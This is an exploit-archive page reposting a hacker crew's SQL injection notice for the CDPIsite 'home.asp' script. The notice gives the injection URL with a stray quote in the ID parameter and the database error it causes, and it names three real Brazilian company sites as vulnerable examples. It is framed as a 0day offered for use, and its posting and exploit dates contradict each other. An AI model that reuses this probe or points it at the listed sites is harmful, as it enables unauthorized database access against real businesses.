CDPI Software SQL Injection

CDPI Software SQL Injection: Posted Feb 18, 2012; Authored by ITTIHACK; CDPI Software suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 93c2dc005ac4c3b606c97f45a505b06ac5c8249483f46ef10613287f7248e251; Download | Favorite | View

CDPI Software SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1               ==========================================               1
 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
 0                                                                        1
 1                       dark-puzzle[at]live[at]fr                        0
 0               ==========================================               1
 1                 Pentesting/exploit coding/bug research                 0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
         [0day Exploits]  Allah , Alwatan , Almalik .[0day Exploits]

# Exploit Title: CDPIsite "home.asp" - SQL injection Vulnerability
# Date: 24 June 2012
# Author: Dark-Puzzle
# Vendor Website : http://www.cdpisite.com.br/
# Version: All Versions 
# Category: Webapps/0day
# Google dork: N/A
# Tested on: Windows Xp Sp2 , Backtrack 5 .

-----------------------------------------------------------

Exploit :

http://www.example.com/home.asp?ID=99'

Asp Error :

Microsoft OLE DB Provider for ODBC Drivers erro '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.1.63]Voc

/[PATH]/detalhes.asp, line 8 

Example Sites :

http://jubileuvidros.com.br/jubileuvidros/home.asp?ID=4'
http://www.paulabrottoimoveis.com.br/paulabrottoimoveis/home.asp?ID=1095'
http://www.rivieraimoveiscompany.com.br/rivieraimoveiscompany/home.asp?ID=773'

------------------------------------------------------------

Follow me : https://www.facebook.com/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Inj3ctor Team , Dr.napst3r , Jigs@w ...

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

CDPI Software SQL Injection

CDPI Software SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CDPI Software SQL Injection

Share This

CDPI Software SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems